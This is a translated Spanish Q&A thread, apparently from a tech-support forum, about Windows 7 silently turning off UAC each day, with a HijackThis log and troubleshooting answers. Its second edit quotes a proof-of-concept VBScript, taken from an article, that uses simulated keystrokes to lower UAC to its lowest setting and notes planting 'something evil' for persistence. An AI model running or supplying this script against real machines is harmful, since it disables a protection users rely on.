Tengo un problema extraño en mi computadora portátil HP. Esto comenzó a suceder recientemente. Cada vez que inicio mi máquina, el Centro de acción de Windows 7 muestra la siguiente advertencia:
Debe reiniciar su computadora para que UAC se apague.
En realidad, esto no sucede si sucedió una vez en un día específico. Por ejemplo, cuando enciendo la máquina por la mañana, aparece; pero nunca aparece en los reinicios posteriores dentro de ese día. Al día siguiente, vuelve a ocurrir lo mismo.
Nunca desactivo UAC, pero obviamente algunos rootkit o virus causan esto. Tan pronto como recibo esta advertencia, me dirijo a la configuración de UAC y vuelvo a habilitar UAC para descartar esta advertencia. Esta es una situación molesta ya que no puedo solucionarlo.
Primero, he realizado un análisis completo en la computadora para detectar cualquier posible virus y actividad de malware / rootkit, pero TrendMicro OfficeScan dijo que no se han encontrado virus. Fui a un antiguo Punto de restauración usando Restaurar sistema de Windows, pero el problema no se resolvió.
Lo que he intentado hasta ahora (que no pudo encontrar el rootkit):
- TrendMicro OfficeScan Antivirus
- AVAST
- Malwarebytes Anti-Malware
- Ad-Aware
- Antivirus Vipre
- GMER
- TDSSKiller (Kaspersky Labs)
- HiJackThis
- RegRuns
- UnHackMe
- SuperAntiSpyware Portable
- Tizer Rootkit Razor ( * )
- Sophos Anti-Rootkit
- SpyHunter 4
- ComboFix
No hay otras actividades extrañas en la máquina. Todo funciona bien, excepto este extraño incidente.
¿Cuál podría ser el nombre de este molesto rootkit? ¿Cómo puedo detectarlo y eliminarlo?
EDITAR: a continuación se muestra el archivo de registro generado por HijackThis:
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 13:07:04, on 17.01.2011
Platform: Windows 7 (WinNT 6.00.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16700)
Boot mode: Normal
Running processes:
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\CheckPoint\SecuRemote\bin\SR_GUI.Exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\VolCtrl.exe
C:\Program Files\LightningFAX\LFclient\lfsndmng.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Microsoft Office Communicator\communicator.exe
C:\Program Files\Iron Mountain\Connected BackupPC\Agent.exe
C:\Program Files\Trend Micro\OfficeScan Client\PccNTMon.exe
C:\Program Files\Microsoft LifeCam\LifeExp.exe
C:\Program Files\Hewlett-Packard\Shared\HpqToaster.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\mimio\mimio Studio\system\aps_tablet\atwtusb.exe
C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE
C:\Program Files\Babylon\Babylon-Pro\Babylon.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Users\userx\Desktop\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = http://www.yaysat.com.tr/proxy/proxy.pac
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Babylon IE plugin - {9CFACCB6-2F3F-4177-94EA-0D2B72D384C1} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe
O4 - HKLM\..\Run: [hpWirelessAssistant] C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [QlbCtrl.exe] C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [lfsndmng] C:\Program Files\LightningFAX\LFclient\LFSNDMNG.EXE
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [Communicator] "C:\Program Files\Microsoft Office Communicator\communicator.exe" /fromrunkey
O4 - HKLM\..\Run: [AgentUiRunKey] "C:\Program Files\Iron Mountain\Connected BackupPC\Agent.exe" -ni -sss -e http://localhost:16386/
O4 - HKLM\..\Run: [OfficeScanNT Monitor] "C:\Program Files\Trend Micro\OfficeScan Client\pccntmon.exe" -HideWindow
O4 - HKLM\..\Run: [Babylon Client] C:\Program Files\Babylon\Babylon-Pro\Babylon.exe -AutoStart
O4 - HKLM\..\Run: [LifeCam] "C:\Program Files\Microsoft LifeCam\LifeExp.exe"
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - Global Startup: mimio Studio.lnk = C:\Program Files\mimio\mimio Studio\mimiosys.exe
O8 - Extra context menu item: Microsoft Excel'e &Ver - res://C:\PROGRA~1\MICROS~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Translate this web page with Babylon - res://C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/ActionTU.htm
O8 - Extra context menu item: Translate with Babylon - res://C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/Action.htm
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~1\Office12\REFIEBAR.DLL
O9 - Extra button: Translate this web page with Babylon - {F72841F0-4EF1-4df5-BCE5-B3AC8ACF5478} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll
O9 - Extra 'Tools' menuitem: Translate this web page with Babylon - {F72841F0-4EF1-4df5-BCE5-B3AC8ACF5478} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll
O16 - DPF: {00134F72-5284-44F7-95A8-52A619F70751} (ObjWinNTCheck Class) - https://172.20.12.103:4343/officescan/console/html/ClientInstall/WinNTChk.cab
O16 - DPF: {08D75BC1-D2B5-11D1-88FC-0080C859833B} (OfficeScan Corp Edition Web-Deployment SetupCtrl Class) - https://172.20.12.103:4343/officescan/console/html/ClientInstall/setup.cab
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = yaysat.com
O17 - HKLM\Software\..\Telephony: DomainName = yaysat.com
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = yaysat.com
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = yaysat.com
O18 - Protocol: qcom - {B8DBD265-42C3-43E6-B439-E968C71984C6} - C:\Program Files\Common Files\Quest Shared\CodeXpert\qcom.dll
O22 - SharedTaskScheduler: FencesShellExt - {1984DD45-52CF-49cd-AB77-18F378FEA264} - C:\Program Files\Stardock\Fences\FencesMenu.dll
O23 - Service: Andrea ADI Filters Service (AEADIFilters) - Andrea Electronics Corporation - C:\Windows\system32\AEADISRV.EXE
O23 - Service: AgentService - Iron Mountain Incorporated - C:\Program Files\Iron Mountain\Connected BackupPC\AgentService.exe
O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - LSI Corporation - C:\Program Files\LSI SoftModem\agrsmsvc.exe
O23 - Service: BMFMySQL - Unknown owner - C:\Program Files\Quest Software\Benchmark Factory for Databases\Repository\MySQL\bin\mysqld-max-nt.exe
O23 - Service: Com4QLBEx - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: OfficeScanNT RealTime Scan (ntrtscan) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\ntrtscan.exe
O23 - Service: SMS Task Sequence Agent (smstsmgr) - Unknown owner - C:\Windows\system32\CCM\TSManager.exe
O23 - Service: Check Point VPN-1 Securemote service (SR_Service) - Check Point Software Technologies - C:\Program Files\CheckPoint\SecuRemote\bin\SR_Service.exe
O23 - Service: Check Point VPN-1 Securemote watchdog (SR_Watchdog) - Check Point Software Technologies - C:\Program Files\CheckPoint\SecuRemote\bin\SR_Watchdog.exe
O23 - Service: Trend Micro Unauthorized Change Prevention Service (TMBMServer) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\..\BM\TMBMSRV.exe
O23 - Service: OfficeScan NT Listener (tmlisten) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\tmlisten.exe
O23 - Service: OfficeScan NT Proxy Service (TmProxy) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\TmProxy.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files\RealVNC\VNC4\WinVNC4.exe
--
End of file - 8204 bytes
Como se sugiere en esta pregunta muy similar , he ejecutado exploraciones completas (+ exploraciones de tiempo de arranque) con RegRun y UnHackMe, pero tampoco encontraron nada. He examinado cuidadosamente todas las entradas en el Visor de eventos, pero no hay nada de malo.
Ahora sé que hay un troyano oculto (rootkit) en mi máquina que parece disfrazarse con bastante éxito. Tenga en cuenta que no tengo la oportunidad de eliminar el HDD o reinstalar el sistema operativo, ya que esta es una máquina de trabajo sujeta a ciertas políticas de TI en el dominio de una empresa.
A pesar de todos mis intentos, el problema aún persiste. Necesito estrictamente un método directo o un removedor de rootkit pukka para eliminar lo que sea. No quiero usar la configuración del sistema, es decir, deshabilitar las ejecuciones automáticas una por una, alterar el registro, etc.
EDIT 2: he encontrado un artículo que está estrechamente relacionado con mi problema:
El malware puede apagar UAC en Windows 7; "Por diseño" dice Microsoft . Un agradecimiento especial (!) A Microsoft.
En el artículo, se proporciona un código VBScript para deshabilitar UAC automáticamente:
'// 1337H4x Written by _____________
'// (12 year old)
Set WshShell = WScript.CreateObject("WScript.Shell")
'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)
'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)
'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)
'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")
'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder
'// Reboot the system
'// WshShell.Run "shutdown /r /f"
Desafortunadamente, eso no me dice cómo puedo deshacerme de este código malicioso que se ejecuta en mi sistema.
EDITAR 3: Anoche, dejé la computadora portátil abierta debido a una tarea SQL en ejecución. Cuando llegué por la mañana, vi que UAC estaba apagado. Entonces, sospecho que el problema no está relacionado con el inicio. Está sucediendo una vez al día, sin importar si la máquina se reinicia.
EDIT 4: Hoy, inmediatamente comencé a "Process Monitor" tan pronto como Windows comenzó a capturar al culpable (gracias a @harrymc por la idea). A las 9:17, el control deslizante UAC se deslizó hacia abajo (el Centro de acción de Windows 7 dio la advertencia). Investigué todas las acciones de registro entre las 9:16 y las 9:18. Guardé el archivo de registro de Process Monitor (70 MB que contiene solo ese intervalo de 2 minutos). Hay muchas EnableLUA = 0
(y otras) entradas. Estoy publicando las capturas de pantalla de las ventanas de propiedades de los primeros 4 a continuación. Dice que svchost.exe
está haciendo esto, y le da algunos hilos y números PID. No sé qué debo inferir sobre ellos:
Respuestas:
Primero debe verificar si el servicio del Centro de seguridad puede iniciarse y, de no ser así, cuál de sus dependencias es la culpable. Busque también mensajes de error en el Visor de eventos.
Si tiene la sensación de que su computadora está infectada, las posibles soluciones pueden ser:
En su caso, esto podría aplicarse: Realización de una recuperación del sistema HP en Windows Vista .
Solo para comentar que Windows es bastante capaz de destruirse a sí mismo sin ninguna ayuda, por lo que Windows Update es más peligroso que cualquier virus. La Reparación de inicio puede solucionar el problema en este caso reiniciando Windows, sin que sea necesario reinstalar las aplicaciones.
Si realmente piensa que el problema es más bien el de un virus, y desea saber más sobre lo que está sucediendo en su computadora, deberá descubrir dos cosas:
Para el primero, si se trata de un cambio en el registro, entonces la clave probablemente sea el
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
elemento EnableLUA , cuyo valor es 0 para Deshabilitar y 1 para Habilitar.Una vez que haya localizado el cambio que se está realizando en su sistema, puede usar Process Monitor y su opción Habilitar registro de inicio (consulte la ayuda) para registrar todos los accesos a la clave.
Primero arrancaría en modo seguro y vería si esto también está sucediendo. De lo contrario, otro vector de ataque es usar Autoruns para deshabilitar los elementos de inicio en una búsqueda binaria del producto (ya que este podría ser un producto legítimo que causa el problema, en lugar de un virus).
fuente
sfc /scannow
y diceWindows Resource Protection Did Not Find Any Integrity Violations
. El paso 2 es arriesgado para mí, ya que esta es una computadora portátil de la empresa sujeta a políticas de TI. Si de alguna manera estropeo el proceso de arranque, tendré más problemas. El paso 3 está fuera de discusión para mí.En mi caso, se aplicaba una política de dominio una vez al día. El mismo problema. El diagnóstico fue más fácil porque el apagado de UAC se produjo solo al iniciar sesión en el dominio o al conectarse a través de VPN. Por lo tanto, se descubrió que la política de dominio incluía algún script para desactivar UAC. Me puse en contacto con los administradores de mi sistema y lo confirmaron. Por lo tanto, es mejor consultar con sus administradores de dominio o validar las políticas y scripts locales del perfil si no está en el dominio.
fuente
Opción 1: deshabilitar todos los programas en el inicio. (Inicio> Ejecutar> Msconfig. Desactive todo durante el inicio).
Opción 2: Instale AVAST home edition y programe un análisis de tiempo de arranque. Mejor aún, desconecte el disco duro de su máquina y conéctelo a otro y escanee desde allí usando AVAST.
Opción 3. Otra opción es ejecutar HijackThis. Genere el informe y compártalo aquí para su análisis. http://free.antivirus.com/hijackthis/
fuente
Instale Microsoft Security Essentials y realice un análisis completo del sistema. Dado que MSE utiliza las API y los ganchos del sistema operativo, es posible que pueda localizar el malware, si en realidad es algún tipo de malware. Además, si MSE no puede realmente instalarse o ejecutarse, entonces sabemos con certeza que el sistema está comprometido.
Desde entonces, ha ejecutado tantos programas antivirus y antimalware para verificar su sistema, dudo mucho que su computadora se haya visto comprometida. En lugar de instalar los programas AV y Anti-Malware y luego hacer un escaneo de arranque, use otra computadora para escanear el disco. Conecte el disco a otro sistema como esclavo y luego ejecute los escaneos. Debe realizar el escaneo de arranque arrancando desde un CD o DVD y no desde el disco duro, ya que eso realmente impide que el sistema operativo se inicie y el kit raíz se ejecute durante el escaneo real.
Honestamente, sin embargo, si está seguro de que su sistema ha sido compuesto por un kit raíz, entonces destruya el disco duro y comience desde cero. Pídale a su departamento de TI que haga esto. Esta es la única forma infalible de asegurarse de que su sistema esté limpio.
fuente
Le recomiendo que cree otra cuenta de usuario en su computadora. No haga de esta cuenta un administrador; manténgalo como un usuario estándar. Use esta nueva cuenta en lugar de su cuenta de administrador. Si necesita derechos de administrador, UAC siempre le solicitará sus credenciales de administrador. De esa manera, el malware no podrá desactivar UAC y ejecutar cosas malvadas ...
Esto no eliminará el virus, pero al menos evitará que empeore. Luego, cuando su antivirus obtenga nuevas definiciones para detectarlo, podrá eliminarlo.
fuente
Antes de pasar a medidas más complicadas, instale AVG Anti-Virus Free Edition 2011 . Deje que realice un escaneo completo de la computadora. Recientemente, he tenido un problema similar, y ningún otro programa antivirus, pero el mencionado anteriormente podría solucionarlo con sus medidas Anti-Rootkit.
fuente
Este es un tema bastante interesante. Debo decir que esto sería causado por uno o dos problemas diferentes:
1) La mayoría de las personas sospecharon de un virus, y con razón, a los virus les encanta entrar a Windows y jugar con la configuración.
Ya tiene una gran cantidad de escaneos ejecutados. Cualquier virus debe ser detectado por los que ya están en ejecución, así que creo que es un ave de Windows.
2) Windows está inventado. Le recomendaría que ejecute una comprobación de disco en su computadora. Dos métodos diferentes que rinden resultados similares.
- Abra mi computadora y luego haga clic derecho en su disco duro desde el que se carga Windows. A continuación, seleccione la pestaña de herramientas y haga clic en el botón que dice Comprobación de disco [o algo similar]. Ahora marque las dos casillas de opción si ya no lo están. Su computadora debe pedirle que reinicie su computadora, si no es así, no marcó las casillas de opción. Deje que se ejecute ese escaneo. Debería limpiar las aves dentro de su instalación de Windows.
Ahora, si ese escaneo falla, inserte el disco de instalación del sistema operativo. Si usa XP, presione R cuando aparezca la pantalla azul preguntándole qué tarea desea hacer. Ahora, seleccione en qué disco duro está su sistema operativo y presione enter después de ingresar el número apropiado. Luego, ingrese la contraseña para la cuenta de administrador [generalmente está en blanco]. Ahora, ingrese a la consola de comandos: chkdsk / r
esto debería hacer el mismo escaneo, sin embargo, puede solucionar más problemas porque el escaneo se ejecuta desde el disco de instalación.
Si ejecuta el escaneo para una máquina VISTA o SEVEN, inserte el disco y seleccione la opción de reparación. Luego, presione cancelar y debería abrir una nueva ventana, en la que puede realizar más operaciones. La última opción debería decir "Ventana de consola" o algo por el estilo.
ingrese a la consola de comandos "chkdsk / r C:"
Espero que esto ayude.
fuente
chkdsk /r C:
en el arranque y me llevó aproximadamente 1 hora. No se encontraron problemas.Acabo de encontrarme con este mismo mensaje. esta mañana. Java ha estado tratando de actualizarse por un tiempo ahora, así que cambié la configuración de notificación a "no notificar" e inmediatamente recibí el mensaje de que tenía que reiniciar mi CPU para desactivar el control. Entré y restablecí el nivel de notificación y el problema se resolvió. Espero que ayude
fuente
Gana 10 usando Malwarebytes. Al parecer, el malware estaba apagando el UAC al inicio. Dejé de cargarlo al inicio y el problema pareció resolverse. Luego ajustó el inicio para retrasar la configuración de Malwarebytes y pareció funcionar.
fuente